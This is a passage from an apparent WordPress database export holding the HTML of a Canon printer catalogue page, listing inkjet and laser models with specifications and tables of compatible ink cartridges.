(Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 10:01:57','2019-09-25 02:01:57','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3322,1,'2019-09-25 09:08:46','2019-09-25 01:08:46','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<p>Â </p><table border=\"1\" width=\"378\"><tbody><tr><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td><td>Maintenance Cartridge MC-20</td></tr><tr><td>PFI-50 (Blue)</td></tr><tr><td>PFI-50 (Chroma Optimizer)</td></tr><tr><td>PFI-50 (Cyan)</td></tr><tr><td>PFI-50 (Gray)</td></tr><tr><td>PFI-50 (Magenta)</td></tr><tr><td>PFI-50 (Matte Black)</td></tr><tr><td>PFI-50 (Photo Black)</td></tr><tr><td>PFI-50 (Photo Cyan)</td></tr><tr><td>PFI-50 (Photo Gray)</td></tr><tr><td>PFI-50 (Photo Magenta)</td></tr><tr><td>PFI-50 (Red)</td></tr><tr><td>PFI-50 (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E3170</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E410</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr></tbody></table><p>Â </p><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E4270</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E470</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E477</td><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E480</td><td>CL-57 (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E510</td><td>CL-98 (Colour)</td></tr><tr><td>PG-88 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E560</td><td>CL-99 (Colour)</td></tr><tr><td>PG-89 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td><td>CL-99 (Colour)</td></tr><tr><td>PG-89 (Pigment Black)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G1000</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G1010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G2010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G3000</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G3010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G4010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP100</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP110</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA iP1300</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td><td>CL-746 (Colour)</td></tr><tr><td>CL-746S (Colour)</td></tr><tr><td>PG-745 (Pigment Black)</td></tr><tr><td>PG-745S (Pigment Black)</td></tr></tbody></table>  <table width=\"378\" border=\"1\" cellpadding=\"10\">\n    <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA iP4200</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA iP7270</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-750 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-750XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"12\" align=\"center\">PIXMA iP8770</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-750 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-750XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"11\" align=\"center\">PIXMA iX6770</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-750 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-750XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-755XXL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"11\" align=\"center\">PIXMA iX6870</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      